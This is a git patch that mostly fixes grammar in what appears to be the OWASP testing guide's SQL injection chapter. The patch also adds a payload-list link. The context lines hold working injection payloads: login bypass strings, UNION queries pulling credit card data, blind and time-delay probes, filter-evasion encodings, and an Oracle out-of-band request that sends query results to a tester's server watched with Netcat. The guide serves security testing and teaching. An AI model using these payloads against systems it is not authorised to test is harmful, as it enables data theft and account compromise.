From 15c8fd89f3aa0328c06616065ca5d3a9c19ecd3a Mon Sep 17 00:00:00 2001
From: Cassidy Camp <109514575+CassidyCamp@users.noreply.github.com>
Date: Sun, 3 Dec 2023 13:49:08 -0600
Subject: [PATCH] Fixed Grammatical Errors + Added List Of Known SQL Injection
 Strings (#1117)

* Fixed Grammatical Errors + Added List Of Known SQL Injection Strings

---------

Co-authored-by: Rick M <kingthorin@users.noreply.github.com>
---
 .../05-Testing_for_SQL_Injection.md           | 130 +++++++++---------
 1 file changed, 66 insertions(+), 64 deletions(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
index ec3565ee03..7c236b90a5 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
@@ -6,17 +6,17 @@
 
 ## Summary
 
-SQL injection testing checks if it is possible to inject data into the application so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation. A successful exploitation of this class of vulnerability allows an unauthorized user to access or manipulate data in the database.
+SQL injection testing checks if it is possible to inject data into an application/site so that it executes a user-controlled SQL query in the database. Testers find a SQL injection vulnerability if the application uses user input to create SQL queries without proper input validation. Successful exploitation of this class of vulnerability allows an unauthorized user to access or manipulate data in the database, which if you didn't know already is quite bad.
 
-An [SQL injection](https://owasp.org/www-community/attacks/SQL_Injection) attack consists of insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application. A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
+An [SQL injection](https://owasp.org/www-community/attacks/SQL_Injection) attack consists of insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application. A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input to affect the execution of predefined SQL commands.
 
-In general the way web applications construct SQL statements involving SQL syntax written by the programmers is mixed with user-supplied data. Example:
+In general, the way web applications construct SQL statements involving SQL syntax written by the programmers is mixed with user-supplied data. Example:
 
 `select title, text from news where id=$id`
 
 In the example above the variable `$id` contains user-supplied data, while the remainder is the SQL static part supplied by the programmer; making the SQL statement dynamic.
 
-Because the way it was constructed, the user can supply crafted input trying to make the original SQL statement execute further actions of the user's choice. The example below illustrates the user-supplied data "10 or 1=1", changing the logic of the SQL statement, modifying the WHERE clause adding a condition "or 1=1".
+Because of the way it was constructed, the user can supply crafted input trying to make the original SQL statement execute further actions of the user's choice. The example below illustrates the user-supplied data "10 or 1=1", changing the logic of the SQL statement, modifying the WHERE clause adding a condition "or 1=1".
 
 `select title, text from news where id=10 or 1=1`
 
@@ -24,19 +24,19 @@ Because the way it was constructed, the user can supply crafted input trying to
 
 SQL Injection attacks can be divided into the following three classes:
 
-- Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page.
+- Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward attack, in which the retrieved data is presented directly in the application web page.
 - Out-of-band: data is retrieved using a different channel (e.g., an email with the results of the query is generated and sent to the tester).
-- Inferential or Blind: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server.
+- Inferential or Blind: there is no actual transfer of data. Still, the tester can reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server.
 
 A successful SQL Injection attack requires the attacker to craft a syntactically correct SQL Query. If the application returns an error message generated by an incorrect query, then it may be easier for an attacker to reconstruct the logic of the original query and, therefore, understand how to perform the injection correctly. However, if the application hides the error details, then the tester must be able to reverse engineer the logic of the original query.
 
-About the techniques to exploit SQL injection flaws there are five commons techniques. Also those techniques sometimes can be used in a combined way (e.g. union operator and out-of-band):
+About the techniques to exploit SQL injection flaws, there are five common techniques. Also, those techniques sometimes can be used in a combined way (e.g. union operator and out-of-band):
 
 - Union Operator: can be used when the SQL injection flaw happens in a SELECT statement, making it possible to combine two queries into a single result or result set.
 - Boolean: use Boolean condition(s) to verify whether certain conditions are true or false.
-- Error based: this technique forces the database to generate an error, giving the attacker or tester information upon which to refine their injection.
-- Out-of-band: technique used to retrieve data using a different channel (e.g., make a HTTP connection to send the results to a web server).
-- Time delay: use database commands (e.g. sleep) to delay answers in conditional queries. It is useful when attacker doesn’t have some kind of answer (result, output, or error) from the application.
+- Error-based: this technique forces the database to generate an error, giving the attacker or tester information upon which to refine their injection.
+- Out-of-band: the technique used to retrieve data using a different channel (e.g., make an HTTP connection to send the results to a web server).
+- Time delay: use database commands (e.g. sleep) to delay answers in conditional queries. It is useful when the attacker doesn’t have some answer (result, output, or error) from the application.
 
 ## Test Objectives
 
@@ -47,13 +47,13 @@ About the techniques to exploit SQL injection flaws there are five commons techn
 
 ### Detection Techniques
 
-The first step in this test is to understand when the application interacts with a DB Server in order to access some data. Typical examples of cases when an application needs to talk to a DB include:
+The first step in this test is to understand when the application interacts with a DB Server to access some data. Typical examples of cases, when an application needs to talk to a DB, include:
 
 - Authentication forms: when authentication is performed using a web form, chances are that the user credentials are checked against a database that contains all usernames and passwords (or, better, password hashes).
-- Search engines: the string submitted by the user could be used in a SQL query that extracts all relevant records from a database.
+- Search engines: the string submitted by the user could be used in an SQL query that extracts all relevant records from a database.
 - E-Commerce sites: the products and their characteristics (price, description, availability, etc) are very likely to be stored in a database.
 
-The tester has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests and then test them separately, trying to interfere with the query and to generate an error. Consider also HTTP headers and Cookies.
+The tester has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests, and then test them separately, trying to interfere with the query and to generate an error. Consider also HTTP headers and Cookies.
 
 The very first test usually consists of adding a single quote `'` or a semicolon `;` to the field or parameter under test. The first is used in SQL as a string terminator and, if not filtered by the application, would lead to an incorrect query. The second is used to end a SQL statement and, if it is not filtered, it is also likely to generate an error. The output of a vulnerable field might resemble the following (on a Microsoft SQL Server, in this case):
 
@@ -73,9 +73,9 @@ varchar value 'test' to a column of data type int.
 /target/target.asp, line 113
 ```
 
-Monitor all the responses from the web server and have a look at the HTML/JavaScript source code. Sometimes the error is present inside them but for some reason (e.g. JavaScript error, HTML comments, etc) is not presented to the user. A full error message, like those in the examples, provides a wealth of information to the tester in order to mount a successful injection attack. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques. In any case, it is very important to test each field separately: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.
+Monitor all the responses from the web server and have a look at the HTML/JavaScript source code. Sometimes the error is present inside them but for some reason (e.g. JavaScript error, HTML comments, etc) is not presented to the user. A full error message, like those in the examples, provides a wealth of information to the tester to mount a successful injection attack. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques. In any case, it is very important to test each field separately: only one variable must vary while all the others remain constant, in order to precisely understand which parameters are vulnerable and which are not.
 
-### Standard SQL Injection Testing
+### Standard SQL Injection Testing Methods
 
 #### Classic SQL Injection
 
@@ -83,7 +83,7 @@ Consider the following SQL query:
 
 `SELECT * FROM Users WHERE Username='$username' AND Password='$password'`
 
-A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to login to the system, otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:
+A similar query is generally used from the web application to authenticate a user. If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to log-in to the system, otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:
 
 `$username = 1' or '1' = '1`
 
@@ -99,15 +99,15 @@ If we suppose that the values of the parameters are sent to the server through t
 
 `http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&amp;password=1'%20or%20'1'%20=%20'1`
 
-After a short analysis we notice that the query returns a value (or a set of values) because the condition is always true (`OR 1=1`). In this way the system has authenticated the user without knowing the username and password.
+After a short analysis, we notice that the query returns a value (or a set of values) because the condition is always true (`OR 1=1`). In this way, the system has authenticated the user without knowing the username and password.
 
-> Note: In some systems the first row of a user table would be an administrator user. This may be the profile returned in some cases.
+> Note: In some systems, the first row of a user table would be an administrator user. This may be the profile returned in some cases.
 
 Another example query is the following:
 
 `SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))`
 
-In this case, there are two problems, one due to the use of the parentheses and one due to the use of MD5 hash function. First of all, we resolve the problem of the parentheses. That simply consists of adding a number of closing parentheses until we obtain a corrected query. To resolve the second problem, we try to evade the second condition. We add to our query a final symbol that means that a comment is beginning. In this way, everything that follows such symbol is considered a comment. Every DBMS has its own syntax for comments, however, a common symbol for the greater majority of databases is `/*`. In Oracle the symbol is `--`. This said, the values that we'll use as Username and Password are:
+In this case, there are two problems, one due to the use of the parentheses and one due to the use of the MD5 hash function. First of all, we resolve the problem of the parentheses. That simply consists of adding some closing parentheses until we obtain a corrected query. To resolve the second problem, we try to evade the second condition. We add to our query a final symbol that means that a comment is beginning. In this way, everything that follows such a symbol is considered a comment. Every DBMS has its own syntax for comments, however, a common symbol for the greater majority of databases is `/*`. In Oracle, the symbol is `--`. This said the values that we'll use as Username and Password are:
 
 `$username = 1' or '1' = '1'))/*`
 
@@ -123,7 +123,7 @@ The request URL will be:
 
 `http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&amp;password=foo`
 
-This may return a number of values. Sometimes, the authentication code verifies that the number of returned records/results is exactly equal to 1. In the previous examples, this situation would be difficult (in the database there is only one value per user). In order to get around this problem, it is enough to insert a SQL command that imposes a condition that the number of the returned results must be one (one record returned). In order to reach this goal, we use the operator `LIMIT <num>`, where `<num>` is the number of the results/records that we want to be returned. With respect to the previous example, the value of the fields Username and Password will be modified as follows:
+This may return some values. Sometimes, the authentication code verifies that the number of returned records/results is exactly equal to 1. In the previous examples, this situation would be difficult (in the database there is only one value per user). To get around this problem, it is enough to insert an SQL command that imposes a condition that the number of the returned results must be one (one record returned). To reach this goal, we use the operator `LIMIT <num>`, where `<num>` is the number of the results/records that we want to be returned. Concerning the previous example, the value of the fields Username and Password will be modified as follows:
 
 `$username = 1' or '1' = '1')) LIMIT 1/*`
 
@@ -139,11 +139,11 @@ Consider the following SQL query:
 
 `SELECT * FROM products WHERE id_product=$id_product`
 
-Consider also the request to a script who executes the query above:
+Consider also the request to a script that executes the query above:
 
 `http://www.example.com/product.php?id=10`
 
-When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test if the application is vulnerable in this scenario is play with logic, using the operators AND and OR.
+When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test if the application is vulnerable in this scenario is to play with logic, using the operators AND and OR.
 
 Consider the request:
 
@@ -157,7 +157,7 @@ In this case, probably the application would return some message telling us ther
 
 #### Stacked Queries
 
-Depending on the API which the web application is using and the DBMS (e.g. PHP + PostgreSQL, ASP+SQL SERVER) it may be possible to execute multiple queries in one call.
+Depending on the API that the web application is using and the DBMS (e.g. PHP + PostgreSQL, ASP+SQL SERVER) it may be possible to execute multiple queries in one call.
 
 Consider the following SQL query:
 
@@ -171,7 +171,7 @@ This way is possible to execute many queries in a row and independent of the fir
 
 ### Fingerprinting the Database
 
-Even though the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, functions to retrieve data such as users names and databases, features, comments line etc.
+Even though the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, and functions to retrieve data such as users' names and databases, features, comments lines, etc.
 
 When the testers move to a more advanced SQL injection exploitation they need to know what the backend database is.
 
@@ -211,7 +211,7 @@ Query failed: ERROR: syntax error at or near
 "’" at character 56 in /www/site/test.php on line 121.
 ```
 
-If there is no error message or a custom error message, the tester can try to inject into string fields using varying concatenation techniques:
+If there is no error message or a custom error message, the tester can try to inject it into string fields using varying concatenation techniques:
 
 - MySql: ‘test’ + ‘ing’
 - SQL Server: ‘test’ ‘ing’
@@ -234,11 +234,11 @@ We will have the following query:
 
 `SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable`
 
-Which will join the result of the original query with all the credit card numbers in the CreditCardTable table. The keyword `ALL` is necessary to get around queries that use the keyword `DISTINCT`. Moreover, we notice that beyond the credit card numbers, we have selected two other values. These two values are necessary because the two queries must have an equal number of parameters/columns in order to avoid a syntax error.
+Which will join the result of the original query with all the credit card numbers in the CreditCardTable table. The keyword `ALL` is necessary to get around queries that use the keyword `DISTINCT`. Moreover, we notice that beyond the credit card numbers, we have selected two other values. These two values are necessary because the two queries must have an equal number of parameters/columns to avoid a syntax error.
 
-The first detail a tester needs to find in order to exploit the SQL injection vulnerability using this technique is the right numbers of columns in the SELECT statement.
+The first detail a tester needs to find to exploit the SQL injection vulnerability using this technique is the right number of columns in the SELECT statement.
 
-In order to achieve this, the tester can use `ORDER BY` clause followed by a number indicating the numeration of database’s column selected:
+To achieve this, the tester can use the `ORDER BY` clause followed by a number indicating the numeration of the database’s column selected:
 
 `http://www.example.com/product.php?id=10 ORDER BY 10--`
 
@@ -246,7 +246,7 @@ If the query executes with success, the tester can assume in this example that t
 
 `Unknown column '10' in 'order clause'`
 
-After the tester finds out the numbers of columns, the next step is to find out the type of columns. Assuming there were 3 columns in the example above, the tester could try each column type, using the NULL value to help them:
+After the tester finds out the number of columns, the next step is to find out the type of columns. Assuming there were 3 columns in the example above, the tester could try each column type, using the NULL value to help them:
 
 `http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--`
 
@@ -258,13 +258,13 @@ If the query executes with success, the first column can be an integer. Then the
 
 `http://www.example.com/product.php?id=10 UNION SELECT 1,1,null--`
 
-After the successful information gathering, depending on the application, it may only show the tester the first result, because the application treats only the first line of the result set. In this case, it is possible to use a `LIMIT` clause or the tester can set an invalid value, making only the second query valid (supposing there is no entry in the database which has an ID that equals 99999):
+After the successful information gathering, depending on the application, it may only show the tester the first result, because the application treats only the first line of the result set. In this case, it is possible to use a `LIMIT` clause or the tester can set an invalid value, making only the second query valid (supposing there is no entry in the database that has an ID that equals 99999):
 
 `http://www.example.com/product.php?id=99999 UNION SELECT 1,1,null--`
 
 #### Hidden Union Exploitation Technique
 
-It’s best when you can exploit a SQL injection with the [union technique](#union-exploitation-technique), because you can retrieve the result of your query in one request.  
+It’s best when you can exploit a SQL injection with the [union technique](#union-exploitation-technique) because you can retrieve the result of your query in one request.  
 But most of the SQL injections in the wild are blind. Yet, you can turn some of them into union-based injections.
 
 **Identification**  
@@ -274,7 +274,7 @@ Either of the following methods can be used to identify these SQL injections:
 2. The `ORDER BY` technique works, but you can't achieve a union-based injection.
 
 **Root Cause**  
-The reason you can’t use the usual Union techniques is the complexity of the vulnerable query. In the Union Technique, you comment the rest of the query after your `UNION` payload. It's fine for normal queries, but in more complicated queries it can be problematic. If the first part of the query depends on the second part of it, commenting the rest of it breaks the original query.  
+The reason you can’t use the usual Union techniques is the complexity of the vulnerable query. In the Union Technique, you comment on the rest of the query after your `UNION` payload. It's fine for normal queries, but in more complicated queries it can be problematic. If the first part of the query depends on the second part of it, commenting on the rest of it breaks the original query.  
 
 **Scenario 1**  
 The vulnerable query is a sub-query, and the parent query handles returning the data.
@@ -316,7 +316,7 @@ GROUP BY
   s1.user_id
 ```
 
-- _Problem:_ You break the query when you comment the rest of the original query after your injected payload, because some aliases or variables become `undefined`.  
+- _Problem:_ You break the query when you comment the rest of the original query after your injected payload because some aliases or variables become `undefined`.  
 - _Solution:_ You need to put appropriate keywords or aliases at the beginning of your payload. this way the first part of the original query stays valid.
 
 **Scenario 3**  
@@ -413,7 +413,7 @@ The vulnerable parameter is being used in several independent queries.
 
 ```text
 <?php
-//retriveing product details based on product ID
+//retrieving product details based on product ID
 $query1 = "SELECT 
              name, 
              inserted, 
@@ -423,7 +423,7 @@ $query1 = "SELECT
            WHERE 
              id = '$id'";
 $result1 = odbc_exec($conn, $query1);
-//retriveing product's comments based on product ID
+//retrieving product comments based on the product ID
 $query2 = "SELECT 
              comments 
            FROM 
@@ -460,7 +460,7 @@ Steps to automate the workflow:
 
 **Example:**  
 Consider the third scenario discussed above.  
-We assume the DMBS is `mysql` and the first and second queries return only one column.
+We assume the DMBS is `MySQL` and the first and second queries return only one column.
 This can be your payload for extracting the version of the database:
 
 ```text
@@ -489,9 +489,9 @@ Automation:
 
 #### Boolean Exploitation Technique
 
-The Boolean exploitation technique is very useful when the tester finds a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known on the outcome of an operation. For example, this behavior happens in cases where the programmer has created a custom error page that does not reveal anything on the structure of the query or on the database. (The page does not return a SQL error, it may just return a HTTP 500, 404, or redirect).
+The Boolean exploitation technique is very useful when the tester finds a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known about the outcome of an operation. For example, this behavior happens in cases where the programmer has created a custom error page that does not reveal anything about the structure of the query or the database. (The page does not return a SQL error, it may just return an HTTP 500, 404, or redirect).
 
-By using inference methods, it is possible to avoid this obstacle and thus succeed in recovering the values of some desired fields. This method consists of carrying out a series of boolean queries against the server, observing the answers and finally deducing the meaning of such answers. We consider, as always, the `www.example.com` domain and we suppose that it contains a parameter named `id` vulnerable to SQL injection. This means that when carrying out the following request:
+By using inference methods, it is possible to avoid this obstacle and thus succeed in recovering the values of some desired fields. This method consists of carrying out a series of boolean queries against the server, observing the answers, and finally deducing the meaning of such answers. We consider, as always, the `www.example.com` domain and we suppose that it contains a parameter named `id` vulnerable to SQL injection. This means that when carrying out the following request:
 
 `http://www.example.com/index.php?id=1'`
 
@@ -501,13 +501,13 @@ We will get one page with a custom error message which is due to a syntactic err
 
 Which is exploitable through the methods seen previously. What we want to obtain is the values of the username field. The tests that we will execute will allow us to obtain the value of the username field, extracting such value character by character. This is possible through the use of some standard functions, present in practically every database. For our example, we will use the following pseudo-functions:
 
-- SUBSTRING (text, start, length): returns a substring starting from the position "start" of text and of length "length". If "start" is greater than the length of text, the function returns a null value.
+- SUBSTRING (text, start, length): returns a substring starting from the position "start" of text and length "length". If "start" is greater than the length of text, the function returns a null value.
 
-- ASCII (char): it gives back ASCII value of the input character. A null value is returned if char is 0.
+- ASCII (char): it gives back the ASCII value of the input character. A null value is returned if char is 0.
 
 - LENGTH (text): it gives back the number of characters in the input text.
 
-Through such functions, we will execute our tests on the first character and, when we have discovered the value, we will pass to the second and so on, until we will have discovered the entire value. The tests will take advantage of the function SUBSTRING, in order to select only one character at a time (selecting a single character means to impose the length parameter to 1), and the function ASCII, in order to obtain the ASCII value, so that we can do numerical comparison. The results of the comparison will be done with all the values of the ASCII table, until the right value is found. As an example, we will use the following value for `Id`:
+Through such functions, we will execute our tests on the first character and, when we have discovered the value, we will pass it to the second and so on, until we will have discovered the entire value. The tests will take advantage of the function SUBSTRING, to select only one character at a time (selecting a single character means imposing the length parameter to 1), and the function ASCII, to obtain the ASCII value, so that we can do numerical comparison. The results of the comparison will be done with all the values of the ASCII table until the right value is found. As an example, we will use the following value for `Id`:
 
 `$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1`
 
@@ -523,7 +523,7 @@ Which will create the following query:
 
 `SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'`
 
-The obtained response from the server (that is HTML code) will be the false value for our tests. This is enough to verify whether the value obtained from the execution of the inferential query is equal to the value obtained with the test executed before. Sometimes, this method does not work. If the server returns two different pages as a result of two identical consecutive web requests, we will not be able to discriminate the true value from the false value. In these particular cases, it is necessary to use particular filters that allow us to eliminate the code that changes between the two requests and obtain a template. Later on, for every inferential request executed, we will extract the relative template from the response using the same function, and we will perform a control between the two templates in order to decide the result of the test.
+The obtained response from the server (that is HTML code) will be the false value for our tests. This is enough to verify whether the value obtained from the execution of the inferential query is equal to the value obtained with the test executed before. Sometimes, this method does not work. If the server returns two different pages as a result of two identical consecutive web requests, we will not be able to discriminate the true value from the false value. In these particular cases, it is necessary to use particular filters that allow us to eliminate the code that changes between the two requests and obtain a template. Later on, for every inferential request executed, we will extract the relative template from the response using the same function, and we will perform a control between the two templates to decide the result of the test.
 
 In the previous discussion, we haven't dealt with the problem of determining the termination condition for our tests, i.e. when we should end the inference procedure. A technique to do this uses one characteristic of the SUBSTRING function and the LENGTH function. When the test compares the current character with the ASCII code 0 (i.e. the value null) and the test returns the value true, then either we are done with the inference procedure (we have scanned the whole string), or the value we have analyzed contains the null character.
 
@@ -541,13 +541,13 @@ The blind SQL injection attack needs a high volume of queries. The tester may ne
 
 #### Error Based Exploitation Technique
 
-An Error based exploitation technique is useful when the tester for some reason can’t exploit the SQL injection vulnerability using other technique such as UNION. The Error based technique consists in forcing the database to perform some operation in which the result will be an error. The point here is to try to extract some data from the database and show it in the error message. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).
+An Error based exploitation technique is useful when the tester for some reason can’t exploit the SQL injection vulnerability using other techniques such as UNION. The Error-based technique consists of forcing the database to perform some operation in which the result will be an error. The point here is to try to extract some data from the database and show it in the error message. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).
 
 Consider the following SQL query:
 
 `SELECT * FROM products WHERE id_product=$id_product`
 
-Consider also the request to a script who executes the query above:
+Consider also the request to a script that executes the query above:
 
 `http://www.example.com/product.php?id=10`
 
@@ -555,21 +555,21 @@ The malicious request would be (e.g. Oracle 10g):
 
 `http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--`
 
-In this example, the tester is concatenating the value 10 with the result of the function `UTL_INADDR.GET_HOST_NAME`. This Oracle function will try to return the hostname of the parameter passed to it, which is other query, the name of the user. When the database looks for a hostname with the user database name, it will fail and return an error message like:
+In this example, the tester is concatenating the value 10 with the result of the function `UTL_INADDR.GET_HOST_NAME`. This Oracle function will try to return the hostname of the parameter passed to it, which is another query, the name of the user. When the database looks for a hostname with the user database name, it will fail and return an error message like:
 
 `ORA-292257: host SCOTT unknown`
 
-Then the tester can manipulate the parameter passed to GET_HOST_NAME() function and the result will be shown in the error message.
+Then the tester can manipulate the parameter passed to the GET_HOST_NAME() function and the result will be shown in the error message.
 
-#### Out of Band Exploitation Technique
+#### Out-of-Band Exploitation Technique
 
-This technique is very useful when the tester find a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known on the outcome of an operation. The technique consists of the use of DBMS functions to perform an out of band connection and deliver the results of the injected query as part of the request to the tester’s server. Like the error based techniques, each DBMS has its own functions. Check for specific DBMS section.
+This technique is very useful when the tester finds a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known about the outcome of an operation. The technique consists of the use of DBMS functions to perform an out-of-band connection and deliver the results of the injected query as part of the request to the tester’s server. Like the error-based techniques, each DBMS has its functions. Check for specific DBMS sections.
 
 Consider the following SQL query:
 
 `SELECT * FROM products WHERE id_product=$id_product`
 
-Consider also the request to a script who executes the query above:
+Consider also the request to a script that executes the query above:
 
 `http://www.example.com/product.php?id=10`
 
@@ -577,7 +577,7 @@ The malicious request would be:
 
 `http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--`
 
-In this example, the tester is concatenating the value 10 with the result of the function `UTL_HTTP.request`. This Oracle function will try to connect to `testerserver` and make a HTTP GET request containing the return from the query `SELECT user FROM DUAL`. The tester can set up a webserver (e.g. Apache) or use the Netcat tool:
+In this example, the tester is concatenating the value 10 with the result of the function `UTL_HTTP.request`. This Oracle function will try to connect to `testerserver` and make an HTTP GET request containing the return from the query `SELECT user FROM DUAL`. The tester can set up a web server (e.g. Apache) or use the Netcat tool:
 
 ```bash
 /home/tester/nc –nLp 80
@@ -589,13 +589,13 @@ Connection: close
 
 #### Time Delay Exploitation Technique
 
-The time delay exploitation technique is very useful when the tester find a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known on the outcome of an operation. This technique consists in sending an injected query and in case the conditional is true, the tester can monitor the time taken to for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).
+The time delay exploitation technique is very useful when the tester finds a [Blind SQL Injection](https://owasp.org/www-community/attacks/Blind_SQL_Injection) situation, in which nothing is known about the outcome of an operation. This technique consists of sending an injected query and in case the conditional is true, the tester can monitor the time taken for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can be different from DBMS to DBMS (check DBMS specific section).
 
 Consider the following SQL query:
 
 `SELECT * FROM products WHERE id_product=$id_product`
 
-Consider also the request to a script who executes the query above:
+Consider also the request to a script that executes the query above:
 
 `http://www.example.com/product.php?id=10`
 
@@ -631,7 +631,7 @@ anypassword
 
 This procedure does not sanitize the input, therefore allowing the return value to show an existing record with these parameters.
 
-> This example may seem unlikely due to the use of dynamic SQL to log in a user, but consider a dynamic reporting query where the user selects the columns to view. The user could insert malicious code into this scenario and compromise the data.
+> This example may seem unlikely due to the use of dynamic SQL to log in a user but consider a dynamic reporting query where the user selects the columns to view. The user could insert malicious code into this scenario and compromise the data.
 
 Consider the following SQL Server Stored Procedure:
 
@@ -656,7 +656,7 @@ This will result in the report running and all users’ passwords being updated.
 
 #### Automated Exploitation
 
-Most of the situation and techniques presented here can be performed in a automated way using some tools. In this article the tester can find information how to perform an automated auditing using [SQLMap](https://wiki.owasp.org/index.php/Automated_Audit_using_SQLMap)
+Most of the situations and techniques presented here can be performed in an automated way using some tools. In this article, the tester can find information on how to perform automated auditing using [SQLMap](https://wiki.owasp.org/index.php/Automated_Audit_using_SQLMap)
 
 ### SQL Injection Signature Evasion Techniques
 
@@ -672,7 +672,7 @@ or 'a'='a'
 or 'a'  =    'a'
 ```
 
-Adding special character like new line or tab that won't change the SQL statement execution. For example,
+Adding special characters like a new line or tab that won't change the SQL statement execution. For example,
 
 ```sql
 or
@@ -682,7 +682,7 @@ or
 
 #### Null Bytes
 
-Use null byte (%00) prior to any characters that the filter is blocking.
+Use null byte (%00) before any characters that the filter is blocking.
 
 For example, if the attacker may inject the following SQL
 
@@ -694,7 +694,7 @@ to add Null Bytes will be
 
 #### SQL Comments
 
-Adding SQL inline comments can also help the SQL statement to be valid and bypass the SQL injection filter. Take this SQL injection as example.
+Adding SQL inline comments can also help the SQL statement to be valid and bypass the SQL injection filter. Take this SQL injection as an example.
 
 `' UNION SELECT password FROM Users WHERE name='admin'--`
 
@@ -726,7 +726,7 @@ To apply the Char(), the SQL injection statement will be
 
 #### String Concatenation
 
-Concatenation breaks up SQL keywords and evades filters. Concatenation syntax varies based on database engine. Take MS SQL engine as an example
+Concatenation breaks up SQL keywords and evades filters. Concatenation syntax varies based on the database engine. Take the MS SQL engine as an example
 
 `select 1`
 
@@ -736,11 +736,11 @@ The simple SQL statement can be changed as below by using concatenation
 
 #### Hex Encoding
 
-Hex encoding technique uses Hexadecimal encoding to replace original SQL statement char. For example, `root` can be represented as `726F6F74`
+Hex encoding technique uses Hexadecimal encoding to replace the original SQL statement char. For example, `root` can be represented as `726F6F74`
 
 `Select user from users where name = 'root'`
 
-The SQL statement by using HEX value will be:
+The SQL statement by using the HEX value will be:
 
 `Select user from users where name = 726F6F74`
 
@@ -750,13 +750,13 @@ or
 
 #### Declare Variables
 
-Declare the SQL injection statement into variable and execute it.
+Declare the SQL injection statement into a variable and execute it.
 
-For example, SQL injection statement below
+For example, the SQL injection statement below
 
 `Union Select password`
 
-Define the SQL statement into variable `SQLivar`
+Define the SQL statement into the variable `SQLivar`
 
 ```sql
 ; declare @SQLivar nvarchar(80); set @myvar = N'UNI' + N'ON' + N' SELECT' + N'password');
@@ -797,13 +797,15 @@ For generic input validation security, refer to the [Input Validation CheatSheet
 - [sqlbftools](http://packetstormsecurity.org/files/43795/sqlbftools-1.2.tar.gz.html)
 - [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](http://sqlmap.org/)
 - [Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool](https://github.com/dtrip/mysqloit)
+- [SQL Injection - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
 
 ## References
 
 - [Top 10 2017-A1-Injection](https://owasp.org/www-project-top-ten/2017/A1_2017-Injection)
 - [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
+- [SQL Injection](https://www.w3schools.com/sql/sql_injection.asp)
 
-Technology specific Testing Guide pages have been created for the following DBMSs:
+Technology-specific Testing Guide pages have been created for the following DBMSs:
 
 - [Oracle](05.1-Testing_for_Oracle.md)
 - [MySQL](05.2-Testing_for_MySQL.md)